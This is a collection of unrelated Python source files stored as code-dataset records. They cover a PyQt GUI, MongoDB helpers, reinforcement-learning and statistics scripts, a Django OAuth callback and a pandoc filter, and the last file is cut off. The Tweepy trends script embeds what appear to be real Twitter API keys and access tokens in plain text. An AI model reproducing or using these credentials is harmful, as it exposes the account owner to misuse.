单输出文字消息\n 1 : 带数据输出消息(验证数据是否正确)数据以字典传入\n :return:\n \"\"\"\n new_msg = \"\"\n if level_value % 10 == 1:\n new_msg = \"Verification:\"\n for key, value in msg.items():\n new_msg += str(key) + \"=\" + str(value) + \",\"\n new_msg = new_msg[:-1]\n if level_value % 10 == 0:\n new_msg = msg\n msg = \"[\" + new_msg + \"]\"\n return msg\n","sub_path":"LogCenter/Center/Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"76165967","text":"import sys\nsys.setrecursionlimit(1 << 20)\nINF = float('inf')\n\n\ndef read_int_list():\n return list(map(int, input().split()))\n\n\ndef read_ints():\n return map(int, input().split())\n\n\ndef dfs(worker_id, children):\n if not children[worker_id]: # no subordinate\n return 1\n\n min_s, max_s = INF, -INF\n for subordinate_id in children[worker_id]:\n s = dfs(subordinate_id, children)\n min_s = min(min_s, s)\n max_s = max(max_s, s)\n\n return min_s + max_s + 1\n\n\ndef main():\n N = int(input())\n children = [[] for _ in range(N)]\n for i in range(1, N):\n i_boss = int(input())\n i_boss -= 1\n children[i_boss].append(i)\n\n print(dfs(0, children))\n\n\nmain()\n","sub_path":"abc/abc26c.py","file_name":"abc26c.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"604853184","text":"import numpy as np\n\nfrom learn_selection.core import (infer_general_target,\n normal_sampler,\n logit_fit,\n probit_fit)\n\ndef simulate(n=100):\n\n # description of statistical problem\n\n truth = np.array([2. , -2.]) / np.sqrt(n)\n\n data = np.random.standard_normal((n, 2)) + np.multiply.outer(np.ones(n), truth) \n S = np.mean(data, 0)\n observed_sampler = normal_sampler(S, 1/n * np.identity(2)) \n\n def selection_algorithm(sampler):\n min_success = 1\n ntries = 3\n success = 0\n for _ in range(ntries):\n noisyS = sampler(scale=0.5)\n success += noisyS.sum() > 0.2 / np.sqrt(n)\n return success >= min_success\n\n # run selection algorithm\n\n observed_outcome = selection_algorithm(observed_sampler)\n\n # find the target, based on the observed outcome\n\n if observed_outcome: # target is truth[0]\n (true_target, \n observed_target, \n target_cov, \n cross_cov) = (truth[0], \n S[0], \n 1./n * np.identity(1), \n np.array([1., 0.]).reshape((2,1)) / n)\n else:\n (true_target, \n observed_target, \n target_cov, \n cross_cov) = (truth[1], \n S[1], \n 1./n * np.identity(1), \n np.array([0., 1.]).reshape((2,1)) / n)\n\n pivot, interval = infer_general_target(selection_algorithm,\n observed_outcome,\n observed_sampler,\n observed_target,\n cross_cov,\n target_cov,\n hypothesis=true_target,\n fit_probability=probit_fit)[:2]\n\n return pivot, (interval[0] < true_target) * (interval[1] > true_target), interval[1] - interval[0]\n\nif __name__ == \"__main__\":\n import statsmodels.api as sm\n import matplotlib.pyplot as plt\n \n n = 100\n U = np.linspace(0, 1, 101)\n P, L = [], []\n plt.clf()\n coverage = 0\n for i in range(300):\n p, cover, l = simulate(n=n)\n coverage += cover\n P.append(p)\n L.append(l)\n print(np.mean(P), np.std(P), np.mean(L) / (2 * 1.65 / np.sqrt(n)), coverage / (i+1))\n\n plt.clf()\n plt.plot(U, sm.distributions.ECDF(P)(U), 'r', linewidth=3)\n plt.plot([0,1], [0,1], 'k--', linewidth=2)\n plt.show()\n","sub_path":"examples/standalone/cleaner_basic_example.py","file_name":"cleaner_basic_example.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"380489118","text":"import os\r\nimport sys\r\nfrom PyQt5.QtWidgets import *\r\n\r\nfrom RESULT.gui.ui_standart_window import Ui_Dialog\r\nfrom RESULT.gui.window1 import window1\r\nfrom RESULT.gui.window2 import window2\r\nfrom RESULT.gui.window3 import window3\r\n\r\n\r\nclass Example(QMainWindow, Ui_Dialog):\r\n def __init__(self):\r\n super().__init__()\r\n self.setupUi(self)\r\n self.nextButton.clicked.connect(self.nextWindow)\r\n self.win1 = window1(self)\r\n\r\n # pixmap = QPixmap('C:/Users/Ibrag/OneDrive/Изображения/Saved Pictures/1.jpg')\r\n # pixmap = pixmap.scaledToWidth(520)\r\n # scene = QGraphicsScene()\r\n # self.regionCoference_graphicsView.setScene(scene)\r\n # scene.addPixmap(pixmap)\r\n\r\n def nextWindow(self):\r\n self.windows.setCurrentIndex(self.windows.currentIndex() + 1)\r\n self.nextButton.setEnabled(False)\r\n self.editingIntervals_pushButton.setVisible(False)\r\n if self.nextButton.text() == \"Далее\" and self.windows.currentIndex() == 1:\r\n self.win2 = window2(self, self.win1.main_Processing)\r\n if self.nextButton.text() == \"Далее\" and self.windows.currentIndex() == 2:\r\n self.win3 = window3(self, self.win1.main_Processing, self.win2.intervals_not_presenter)\r\n if self.nextButton.text() == \"Завершить\":\r\n if self.saveAllIntervalsInFiles_checkBox.isChecked():\r\n pathResult = self.win1.main_Processing.audioProcessing.pathVideo + \"Result/\"\r\n if not os.path.exists(pathResult):\r\n os.makedirs(name=pathResult)\r\n else:\r\n for file in os.listdir(pathResult):\r\n os.remove(pathResult + file)\r\n textIntervals = self.textBox_intervalsSilence.toPlainText()\r\n if textIntervals != 'No!':\r\n self.saveIntervalsInFile(path_name=pathResult + \"intervalsSilence.txt\",\r\n intervals=textIntervals)\r\n textIntervals = self.textBox_intervalsPresenter.toPlainText()\r\n if textIntervals != 'No!':\r\n self.saveIntervalsInFile(path_name=pathResult + \"intervalsPresenter.txt\",\r\n intervals=textIntervals)\r\n textIntervals = self.textBox_intervalsSomeone.toPlainText()\r\n if textIntervals != 'No!':\r\n self.saveIntervalsInFile(path_name=pathResult + \"intervalsSomeone.txt\",\r\n intervals=textIntervals)\r\n textIntervals = self.textBox_intervalsTogether.toPlainText()\r\n if textIntervals != 'No!':\r\n self.saveIntervalsInFile(path_name=pathResult + \"intervalsTogether.txt\",\r\n intervals=textIntervals)\r\n QMessageBox.about(self, \"Успешно!\", \"Интервалы успешно сохранены в файлы!\\n\")\r\n sys.exit()\r\n\r\n def saveIntervalsInFile(self, path_name, intervals):\r\n f = open(path_name, 'w')\r\n for interval in intervals.split('\\n'):\r\n if len(interval) > 0:\r\n f.write(interval + '\\n')\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication([])\r\n form = Example()\r\n form.show()\r\n app.exec()\r\n","sub_path":"Code Python/Project/RESULT/gui/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"3407282","text":"#!/usr/bin/env python\n# encoding: utf-8\nimport sys, os\nimport numpy as np\nparent_dir=os.getcwd()\npath= os.path.dirname(parent_dir)\nsys.path.append(path)\n\nfrom pymongo import MongoClient\nfrom conexionMongo import *\n\nfrom datetime import datetime\nimport dateutil.parser\n\ndef getTweetsClasificados(entrena_ini, entrena_fin):\n\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n coleccion = getCollEntrenado()\n tweetsEntrenados = db[coleccion]\n\n entrena_ini = entrena_ini + ' 00:00:00'\n entrena_ini=datetime.strptime(entrena_ini,\"%Y-%m-%d %H:%M:%S\")\n\n entrena_fin = entrena_fin + ' 23:59:59'\n entrena_fin=datetime.strptime(entrena_fin,\"%Y-%m-%d %H:%M:%S\")\n\n tw = tweetsEntrenados.find({\n 'fechaTweet':{\n '$gte': entrena_ini,\n '$lt': entrena_fin\n }\n })\n\n return list(tw)\n\ndef getTweetsClasificadosMM(fechaini,fechafin):\n\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n coleccion = getCollEntrenado()\n tweetsEntrenados = db[coleccion]\n\n #idt=[]\n texto=[]\n categoria=[]\n fechaini=datetime.strptime(fechaini,\"%Y-%m-%d\")\n fechafin=datetime.strptime(fechafin,\"%Y-%m-%d\")\n #for text in tweetsdb.find({\"idioma\":\"es\",\"consulta\": \"@AjuntamentVLC\", \"fechaDescarga\":\"22-03-17\"},{\"idt\":1,\"tweet\":1,\"_id\":0}) :\n for text in tweetsEntrenados.find({\"fechaTweet\":{ \"$gt\" :fechaini ,\"$lt\" :fechafin}},{\"categoria\":1,\"texto\":1,\"_id\":0}) :\n categoria.append(str(text['categoria'].encode('utf-8')))\n texto.append(str(text['texto'].encode('utf-8')))\n\n return texto,categoria\n\ndef addClasificador(nombre, accMedio, desviacion, entrena_ini, entrena_fin):\n\n entrena_ini = entrena_ini + ' 00:00:00'\n entrena_ini=datetime.strptime(entrena_ini,\"%Y-%m-%d %H:%M:%S\")\n\n entrena_fin = entrena_fin + ' 23:59:59'\n entrena_fin=datetime.strptime(entrena_fin,\"%Y-%m-%d %H:%M:%S\")\n\n modelo = {\n 'nombre': nombre,\n 'accuracy': accMedio,\n 'desviacion': desviacion,\n 'entrena_ini': entrena_ini,\n 'entrena_fin': entrena_fin,\n 'fecha_creacion': datetime.now(),\n 'predeterminado': False\n }\n\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n coleccion = getCollClasificadores()\n clasificadores = db[coleccion]\n\n post_id = clasificadores.insert(modelo)\n\ndef getClasificadores():\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n coleccion = getCollClasificadores()\n cursor = db[coleccion]\n clasificadores = cursor.find({})\n\n return list(clasificadores)\n\n\ndef eliminarClasificadorDAO(nombre):\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n coleccion = getCollClasificadores()\n cursor = db[coleccion]\n\n\n result = cursor.delete_one({'nombre': nombre})\n\n if result.deleted_count != 1:\n raise Exception('Ha fallado el eliminar el clasificador ' + nombre)\n\n\ndef getClasiDefecto():\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n coleccion = getCollClasificadores()\n cursor = db[coleccion]\n clasificador = cursor.find({\n 'predeterminado': True\n }).limit(1)\n\n return ((list(clasificador))[0])['nombre']\n\n\ndef editarClasificadorDAO(nombreOri, nombreNuev):\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n\n coleccion = getCollClasificadores()\n cursor = db[coleccion]\n\n clasificador =cursor.find_one({'nombre':nombreOri})\n reg_id=clasificador['_id']\n\n result = cursor.update_one(\n {'_id':reg_id},\n {'$set':{\n 'nombre':nombreNuev\n }\n }\n )\n\ndef updateClasificador(nombre, accMedio, desviacion, entrena_ini, entrena_fin):\n\n entrena_ini = entrena_ini + ' 00:00:00'\n entrena_ini=datetime.strptime(entrena_ini,\"%Y-%m-%d %H:%M:%S\")\n entrena_fin = entrena_fin + ' 23:59:59'\n entrena_fin=datetime.strptime(entrena_fin,\"%Y-%m-%d %H:%M:%S\")\n\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n\n coleccion = getCollClasificadores()\n cursor = db[coleccion]\n\n clasificador =cursor.find_one({'nombre':nombre})\n reg_id=clasificador['_id']\n\n result = cursor.update_one(\n {'_id':reg_id},\n {'$set':{\n 'accuracy': accMedio,\n 'desviacion': desviacion,\n 'entrena_ini': entrena_ini,\n 'entrena_fin': entrena_fin,\n 'fecha_creacion': datetime.now()\n }\n }\n )\n","sub_path":"DAO/administrarClasificadoresDAO.py","file_name":"administrarClasificadoresDAO.py","file_ext":"py","file_size_in_byte":5282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"212114341","text":"\r\nimport sys\r\nimport json\r\nimport tweepy\r\nimport yweather\r\nimport pprint\r\n\r\n\r\n# Authenticate to Twitter\r\nauth = tweepy.OAuthHandler(\"G9Rtluy2antY7VS4AJrZKKIw4\", \"6TvT2Pv4xH7wlinY3grouP2FBBG5Q99LvkL2vWrR1zWzelB5Q5\")\r\nauth.set_access_token(\"1254018042511622144-LJjE1f57lVoIK5Dtt7B5pfH76qFecY\", \"mDcYFQrOl7K6vOdQh7xapuXpNTY9pwRr2FG3YBp1ogmHE\")\r\n\r\n# Create API object\r\napi = tweepy.API(auth, wait_on_rate_limit=True,\r\n wait_on_rate_limit_notify=True)\r\n\r\n# calling the data from the json file to get woeid id\r\ncountry=input(\"enter a country\")\r\nCountry_WOE_ID=None\r\ninput_file = open('trends-locations.json')\r\ndata = json.load(input_file) # get the data list\r\nfor element in data:\r\n if (element['country'].lower() == country):\r\n id = element['parentid']\r\n print (id)\r\n Country_WOE_ID = id\r\n break # print it\r\n\r\n# check if country is exsists and printy trednds\r\n\r\nif Country_WOE_ID is not None:\r\n country_trends = api.trends_place(Country_WOE_ID)\r\n trends = json.loads(json.dumps(country_trends, indent=1))\r\n list=[]\r\n for trend in trends[0][\"trends\"]:\r\n print (trend[\"name\"])\r\n # list.append(trend[\"name\"])\r\n #print(list)\r\n# else print list of countries\r\nelse :\r\n print(\"wrong name choose one of these countries only \")\r\n country_list=[]\r\n for element in data:\r\n if(element['country'] in country_list):\r\n continue\r\n else:\r\n country_list.append(element['country'])\r\n for c in country_list:\r\n print(c)\r\n\r\n\r\n\r\n#trends_result = api.trends_place(1)\r\n#for trend in trends_result[0][\"trends\"]:\r\n #print(trend[\"name\"])\r\n","sub_path":"twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"365926516","text":"import gym\nimport numpy as np\n\nimport torch\nfrom torch.distributions.categorical import Categorical\nfrom torch.nn import functional as F\nimport torch.optim as optim\n\nfrom model import Agent\nfrom storage import Memory\nfrom algorithms import A2C_step\n\ndef fill_replay(env, agent, replay):\n \"\"\"\n This function uses our agent and our environemnt\n to fill our replay buffer.\n \"\"\"\n\n #initialize the env and convert the obs to torch\n obs = torch.from_numpy(env.reset()).float()\n\n #book keeping variables\n total_reward = 0\n current_reward = 0\n num_episodes = 0\n\n for i in range(replay._capacity):\n #see storage.py for details on the Memory class\n s0 = obs\n action_logits, value = agent(obs)\n\n \"\"\"\n for cartpole, we have two actions: left and right.\n the output of our neural network is just a vector of two numbers.\n we need to represent those numbers as probabilities, so they \n must be on [0,1] and sum to 1. \n \n now, we COULD just shift and normalize the output, but this is \n bad because we would like larger outputs to correspond to more \n confidence. if we just shift and norm, then only the relative \n ratio between the outputs will affect the confidence. to get around \n this we normalize after an exponential transform, which is known as the \n Softmax funciton: prob[i] = exp(outputs[i])/sum(exp(outputs)).\n\n once we have this vector of probabilities, we want to sample it \n to get the action. we could have used np.random.choice with a \n specific probability array, but the torch categorical distribution\n handles all the softmax crap for us internally, so we use that instead\n \"\"\"\n action = Categorical(logits = action_logits).sample()\n obs, rews, dones, infos = env.step(action.numpy())\n obs = torch.from_numpy(obs).float()\n current_reward += rews\n\n #now that we have our transition, we store it for later\n replay.remember(s0, \n action_logits, \n action, \n rews,\n value, \n dones)\n\n if dones:\n obs = torch.from_numpy(env.reset()).float()\n num_episodes += 1\n total_reward += current_reward\n print(\"episode \"+str(num_episodes)+\":\", current_reward)\n current_reward=0\n\n env.render()\n\n \"\"\"\n the infinite horizon stochastic return is defined by a sum over an \n infinate number of time steps. we obviously cannot do this, so we bootstrap\n the calculation using our value funciton to approximate the sum of the terms\n from N to infinity.\n \"\"\"\n _, final_value = agent(obs)\n replay.compute_returns(final_value) \n return total_reward/num_episodes \n\nif __name__==\"__main__\":\n \"\"\"\n cartPole-v0 is the environment. openai often registers multiple\n environments with slightly different parameters as different versions\n of that environment (in this case, v0 terminates after 200 steps, while\n v1 terminates after 500)\n \"\"\"\n env = gym.make('CartPole-v0')\n\n \"\"\"\n these can be exctracted from a general environment using \n openai spaces. in a general algorithm you would have a \n typecheck here for the space and then extract the \n shape from that space. \n \"\"\"\n numObs = 4\n numActions = 2\n\n \"\"\"\n the replay length in A2C is a hyperparameter.\n for simplicitly, I do not preform batching in this\n example but often times you will need to specify \n a batch and minibatch size as well\n \"\"\"\n memLength = 500\n hiddenSize = 32\n\n \"\"\"\n A2C is an \"offline\" algorithm, which means\n we collect transitions and then we batch train\n our models on that dataset like we would any other\n \"\"\"\n replay = Memory(memLength,4,2)\n obs = env.reset()\n env.render()\n \n \"\"\"\n the optimizer is generally a hyperparameter of a \n given RL algorithm. Adam is a common choice but \n it has stability issues in more complex environments. \n SGD is usually a safer bet. 1E-2 is an extremely \n fast learning rate, but we can get away with it for\n this environment\n \"\"\"\n agent = Agent(numObs, numActions, hiddenSize)\n optimizer = optim.Adam(agent.parameters(), 1E-3)\n\n for i in range(1000):\n \"\"\"\n we are going to execute 1000 epochs of training, \n though we really dont need to for cartpole. in \n each epoch, we collect our transitions by having \n the agent interact with the environment, and then\n we update the parameters of the agent\n \"\"\"\n mean_reward = fill_replay(env, agent, replay)\n actorLoss, criticLoss = A2C_step(optimizer, agent, replay)\n print(\"#####################################\")\n print(\"epoch: \", i)\n print(\"mean reward:\", mean_reward)\n print(\"actor loss: \", actorLoss)\n print(\"critic loss \", criticLoss)\n print(\"#####################################\")\n\n ","sub_path":"A2C/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"585991507","text":"from django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom .models import *\nfrom accounts.models import *\nimport time\nimport urllib2\nimport urllib\nimport json\nfrom utils import SECURE_settings\nfrom django.shortcuts import redirect\nfrom django.conf import settings\nfrom documents import create_document\nfrom django.contrib.sessions.models import Session\nfrom django.contrib.auth.models import User\nfrom datetime import datetime\n\ndef saveCode(code, user, scope):\n\tif PlatformCode.objects.filter(user=user).count() > 0:\n\t\treturn True\n\tc = PlatformCode.objects.create(code=code, user=user, time_generated=int(time.time()))\n\tfor s in scope:\n\t\tc.scope.add(PlatformScope.objects.get(key=s))\n\tc.save()\n\treturn True\n\ndef exchangeCodeForToken(code):\n\tvalues = {}\n\tvalues['code'] = code\n\tvalues['grant_type'] = 'authorization_code'\n\tvalues['client_id'] = SECURE_settings.PLATFORM['client_id']\n\tvalues['client_secret'] = SECURE_settings.PLATFORM['client_secret']\n\tvalues['redirect_uri'] = settings.PLATFORM['redirect_uri']\n\tdata = urllib.urlencode(values)\n\treq = urllib2.Request(settings.PLATFORM['platform_uri_token'], data)\n\ttry:\n\t\tresponse = urllib2.urlopen(req).read()\n\texcept urllib2.HTTPError as e: \n\t\tresponse = e.read()\n\t\treturn response\n\n\treturn json.loads(response)\n\t\ndef saveToken(user, token, code):\n\tc = PlatformCode.objects.get(code=code)\n\tt = PlatformAccessToken.objects.create(user = user, token = token['access_token'], token_type = token['token_type'], refresh_token = token['refresh_token'], expire = int(int(time.time()) + int(token['expires_in'])), code = c)\n\tfor s in token['scope'].split(','):\n\t\tt.scope.add(PlatformScope.objects.get(key=s))\n\tt.save()\n\n\tc.exchanged = True\n\tc.time_exchanged = int(time.time())\n\tc.save()\n\n\treturn True\n\ndef updateUserStatus(user):\n\ttry:\n\t\tparticipant = Participant.objects.get(user=user)\n\t\tparticipant.status = 'initiated'\n\t\tparticipant.save()\n\texcept Participant.DoesNotExist:\n\t\tparticipant = Participant.objects.create(user=user, status='initiated')\n\n\treturn True\n\t\n@login_required\ndef authorize(request):\n\ttry:\n\t\tsessions = Session.objects.filter(expire_date__gte=datetime.now())\n\t\tfor session in sessions:\n\t\t\tdata = session.get_decoded()\n\t\t\ttry: user = User.objects.filter(id=data.get('_auth_user_id', None))[0]\n\t\t\texcept: continue\n\t\t\tif request.user == user: session.delete()\n\texcept: pass\n\n\turl = settings.PLATFORM['platform_uri']+'oauth2/oauth2/authorize/'\n\turl += '?redirect_uri='+settings.PLATFORM['redirect_uri']\n\turl += '&scope='+'enroll'\n\turl += '&client_id='+SECURE_settings.PLATFORM['client_id']\n\turl += '&response_type='+'code'\n\t#return HttpResponse(url)\n\treturn redirect(url)\n\n@login_required\ndef callback(request):\n\terror = request.REQUEST.get('error', '')\n\tif not error == '':\n\t\treturn redirect(settings.PLATFORM['platform_uri']+'?status=auth_error')\n\n\tcode = request.REQUEST.get('code')\n\tscope = request.REQUEST.get('scope').split(',')\n\tuser = request.user\n\n\tsaveCode(code, user, scope)\n\ttoken = exchangeCodeForToken(code)\n\tif 'error' in token:\n\t\treturn redirect(settings.PLATFORM['platform_uri']+'?status=token_error')\n\tif not saveToken(user, token, code):\n\t\treturn redirect(settings.PLATFORM['platform_uri']+'?status=save_token_error')\n\t\n\tif 'enroll' in scope:\n\t\tcreate_document.createInformedConsent(user, 'da')\n\t\n\t#return HttpResponse(json.dumps(scope))\n\treturn redirect(settings.PLATFORM['platform_uri']+'?status=success&message=You are now enrolled!')\n","sub_path":"sensible_data_service/platform_manager/registration.py","file_name":"registration.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"162447302","text":"\n# @Title: 删除有序数组中的重复项 (Remove Duplicates from Sorted Array)\n# @Author: 18015528893\n# @Date: 2021-02-19 11:37:02\n# @Runtime: 48 ms\n# @Memory: 15.7 MB\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n n = len(nums)\n i = 0\n for j in range(n):\n if nums[j] != nums[i]:\n i += 1\n nums[i] = nums[j]\n return i + 1\n\n\n","sub_path":"Problemset/remove-duplicates-from-sorted-array/remove-duplicates-from-sorted-array.py","file_name":"remove-duplicates-from-sorted-array.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"583010916","text":"#!/usr/bin/env python\n\"\"\"\nPandoc filter to pass all code blocks through pygments highlighter.\n\"\"\"\n__app_name__ = \"pandocfilter-pygments\"\n\nfrom pandocfilters import toJSONFilter, RawBlock\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name, guess_lexer, TextLexer\nfrom pygments.formatters import get_formatter_by_name\n\ndef pygmentize(key, value, format, meta):\n if key == 'CodeBlock':\n [[ident, classes, keyvals], code] = value\n\n lexer = None\n for klass in classes:\n if klass == \"commonlisp\":\n klass = \"lisp\"\n try:\n lexer = get_lexer_by_name(klass)\n break\n except:\n pass\n\n if lexer is None:\n try:\n lexer = guess_lexer(code)\n except:\n lexer = TextLexer()\n\n if format == \"html5\":\n format = \"html\"\n\n if format == \"html\":\n formatter = get_formatter_by_name(format) \\\n .__class__(cssclass=\"highlight \" + klass)\n else:\n formatter = get_formatter_by_name(format)\n\n return RawBlock(format, highlight(code, lexer, formatter))\n\n\ndef cli():\n toJSONFilter(pygmentize)\n","sub_path":"src/pandocfilter_pygments/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"634761866","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import svm\nimport random\nfrom sklearn import linear_model\nfrom sklearn import neighbors\nimport matplotlib.pyplot as plt\n\n# create dictionaries to go from number <-> type and tier -> number\nrandom.seed(7089278395)\ntypes = ['Steel', 'Fairy', 'Dragon', 'Bug', 'Electric', 'Fire', 'Grass', 'Rock', 'Dark', 'Flying', 'Ground', 'Poison', 'Normal', 'Fighting', 'Ghost', 'Ice', 'Psychic', 'Water']\ndtypes = {types[i]:i for i in range(len(types))}\ntiers = ['CAP', 'LC', 'Untiered', 'PU', 'PUBL', 'NU', 'NUBL', 'RU', 'RUBL', 'UU', 'UUBL', 'OU', 'Uber', 'AG']\ndtiers = {tiers[i]:(10*(i-2)) for i in range(len(tiers))}\nnum_to_tier = {(10*(i-2)):tiers[i] for i in range(len(tiers))}\n\n# read in the data\ndf = pd.read_csv('pokemonstats.csv')\n#for t in ['Untiered', 'PU', 'NU', 'RU', 'UU', 'OU', 'Uber']:\n#\tprint('There are %i Pokemon in %s' %(sum(df['tier']==dtiers[t]), t))\n#print('------------------------')\n\n# clean out certain parts of the data\ndf = df.loc[df['tier'] >= 0]\t\t\t# excludes CAP and LC\ndf = df.loc[df['is_nfe'] == 0]\t\t\t# excludes NFE mons\ndf = df.loc[df['tier'] > 0]\t\t\t# excludes Untiered mons\n\n# the names of the pokemon\nnames = np.array(df['name'])\n\n# turn the data into a NumPy array and separate into training and testing\ndata = np.array(df)\ntrain_idxs = np.array(random.sample(range(len(data)), int(0.9*len(data))))\t# train on 90 % of the data\ntest_idxs = np.array([i for i in range(len(data)) if i not in train_idxs])\n\ntrain_X = np.array(data[train_idxs, 1:-1], dtype = float)\ntrain_y = np.array(data[train_idxs, -1], dtype = float)\ntest_X = np.array(data[test_idxs, 1:-1], dtype = float)\ntest_y = np.array(data[test_idxs, -1], dtype = float)\n\n# uncomment these lines to only include certain parts of the data\n# only use BST\n#train_X, test_X = [arr[:,:6] for arr in [train_X, test_X]]\n\n# only use atk, spa, spe\n#train_X, test_X = [arr[:,[1, 3, 5]] for arr in [train_X, test_X]]\n\n# use 4 different fitting models to compare accuracy\nx = 2638952\nmodels = [svm.LinearSVC(random_state=x, max_iter=1e5), \n\t linear_model.Lasso(random_state=x, alpha=0.1), \n\t neighbors.KNeighborsClassifier(n_neighbors=5, weights='distance'),\n\t svm.SVR(kernel='linear')]\ntitles = ['Linear Classification', 'Lasso Regression', 'K-Neighbors Classification', 'Linear Regression']\n\n# train & test the models\n# plot the deviations from the correct values of each model\nfig = plt.figure()\nfig.add_subplot(111, frameon=False)\nplt.tick_params(labelcolor='none', top=False, bottom=False, left=False, right=False)\nplt.xlabel('Error', fontsize = 16)\nplt.ylabel('Density', fontsize = 16)\nfor i in range(len(titles)):\n\tax = fig.add_subplot(2, 2, i+1)\n\tclf = models[i]\n\tclf.fit(train_X, train_y)\n\tpredict_y = clf.predict(test_X)\n\tdiff = test_y - predict_y\n\tax.hist(diff, histtype = 'step', bins = 15, density=True)#, label = titles[i])\n\tax.set_title(titles[i])\n\n\tcloseness = 20\n\tnright = sum(abs(predict_y-test_y)<=closeness)\n\tprint('%s predicted with %.1f percent accuracy' %(titles[i], nright/len(predict_y)*100))\n\nplt.tight_layout()\nplt.show()\n","sub_path":"learn.py","file_name":"learn.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"401152939","text":"#! /usr/bin/env python\n\"\"\"CLI interface for manual preparation of PDFs\"\"\"\nfrom __future__ import annotations\n\nimport os\nimport platform\nimport re\nimport subprocess\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\nimport zope.interface\nfrom dataclasses_jsonschema import JsonSchemaMixin\n\nimport colrev.env.package_manager\nimport colrev.exceptions as colrev_exceptions\nimport colrev.record\nimport colrev.ui_cli.cli_colors as colors\n\nif False: # pylint: disable=using-constant-test\n from typing import TYPE_CHECKING\n\n if TYPE_CHECKING:\n import colrev.ops.pdf_prep_man\n\n\n# pylint: disable=too-few-public-methods\n\n\n@zope.interface.implementer(\n colrev.env.package_manager.PDFPrepManPackageEndpointInterface\n)\n@dataclass\nclass CoLRevCLIPDFManPrep(JsonSchemaMixin):\n \"\"\"Manually prepare PDFs based on a CLI (not yet implemented)\"\"\"\n\n settings_class = colrev.env.package_manager.DefaultSettings\n ci_supported: bool = False\n\n def __init__(\n self,\n *,\n pdf_prep_man_operation: colrev.ops.pdf_prep_man.PDFPrepMan, # pylint: disable=unused-argument\n settings: dict,\n ) -> None:\n self.settings = self.settings_class.load_settings(data=settings)\n\n def __update_metadata(\n self, *, record: colrev.record.Record\n ) -> colrev.record.Record:\n valid_selections = [\"a\", \"c\", \"t\", \"v\", \"n\", \"p\", \"s\"]\n user_selection = \"\"\n print(\n \"Update metadata fields: \"\n \"(a)uthor, (c)ontainer title, (t)itle, (v)olume, (n)umber, (p)ages or (s)ave\"\n )\n while user_selection not in valid_selections:\n user_selection = input(\"Selection: \")\n\n if \"s\" == user_selection:\n break\n if \"a\" == user_selection:\n author = input(\"Authors:\")\n record.update_field(\n key=\"author\", value=author, source=\"manual_correction\"\n )\n elif \"c\" == user_selection:\n if \"journal\" in record.data:\n journal = input(\"Journal:\")\n record.update_field(\n key=\"journal\", value=journal, source=\"manual_correction\"\n )\n if \"booktitle\" in record.data:\n booktitle = input(\"Booktitle:\")\n record.update_field(\n key=\"booktitle\", value=booktitle, source=\"manual_correction\"\n )\n elif \"t\" == user_selection:\n title = input(\"Title:\")\n record.update_field(\n key=\"title\", value=title, source=\"manual_correction\"\n )\n elif \"v\" == user_selection:\n volume = input(\"Volume:\")\n record.update_field(\n key=\"volume\", value=volume, source=\"manual_correction\"\n )\n elif \"n\" == user_selection:\n number = input(\"Number:\")\n record.update_field(\n key=\"number\", value=number, source=\"manual_correction\"\n )\n elif \"p\" == user_selection:\n pages = input(\"Pages:\")\n record.update_field(\n key=\"pages\", value=pages, source=\"manual_correction\"\n )\n user_selection = \"\"\n\n return record\n\n def pdf_prep_man(\n self, pdf_prep_man_operation: colrev.ops.pdf_prep_man.PDFPrepMan, records: dict\n ) -> dict:\n \"\"\"Prepare PDF manually based on a cli\"\"\"\n\n # pylint: disable=too-many-statements\n to_skip = 0\n\n def man_pdf_prep(\n pdf_prep_man: colrev.ops.pdf_prep_man.PDFPrepMan,\n records: dict,\n item: dict,\n stat: str,\n ) -> dict:\n # pylint: disable=no-member\n # pylint: disable=too-many-branches\n # pylint: disable=too-many-locals\n\n current_platform = platform.system()\n if current_platform in [\"Linux\", \"Darwin\"]:\n os.system(\"clear\")\n else:\n os.system(\"cls\")\n\n print(stat)\n record = colrev.record.Record(data=item)\n 